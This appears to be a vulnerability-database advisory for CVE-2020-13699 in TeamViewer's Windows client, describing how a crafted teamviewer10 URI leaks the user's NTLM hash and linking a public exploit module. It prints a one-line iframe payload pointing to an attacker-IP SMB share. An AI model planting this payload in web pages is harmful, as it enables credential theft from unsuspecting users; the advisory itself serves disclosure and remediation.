Main Vulnerability Database Exploits ID:4502 - Exploit for Unquoted Search Path or Element in TeamViewer Remote Full Client for Windows - CVE-2020-13699

ID:4502 - Exploit for Unquoted Search Path or Element in TeamViewer Remote Full Client for Windows - CVE-2020-13699

Published: August 19, 2020

Vulnerability identifier: #VU42044

Vulnerability risk: High

CVE-ID: CVE-2020-13699

CWE-ID: CWE-428

Exploitation vector: Remote access

Vulnerable software:
TeamViewer Remote Full Client for Windows

Link to public exploit:

https://www.rapid7.com/db/modules/auxiliary/server/teamviewer_uri_smb_redirect

Vulnerability description

The vulnerability allows a remote attacker to gain access to sensitive information.

The vulnerability exists due to TeamViewer Desktop for Windows processes URI handlers in an insecure manner. A remote attacker can create a specially crafted link, trick the victim into clicking it and force the application to send an NTLM authentication request to a remote system.

Successful exploitation of the vulnerability may allow an attacker to obtain NTLM hash of the current Windows user, which may result in system compromise.

Exploitation example:

<iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'>

Remediation

Install updates from vendor's website.

ID:4502 - Exploit for Unquoted Search Path or Element in TeamViewer Remote Full Client for Windows - CVE-2020-13699

Link to public exploit:

Vulnerability description

Remediation

Please verify you're human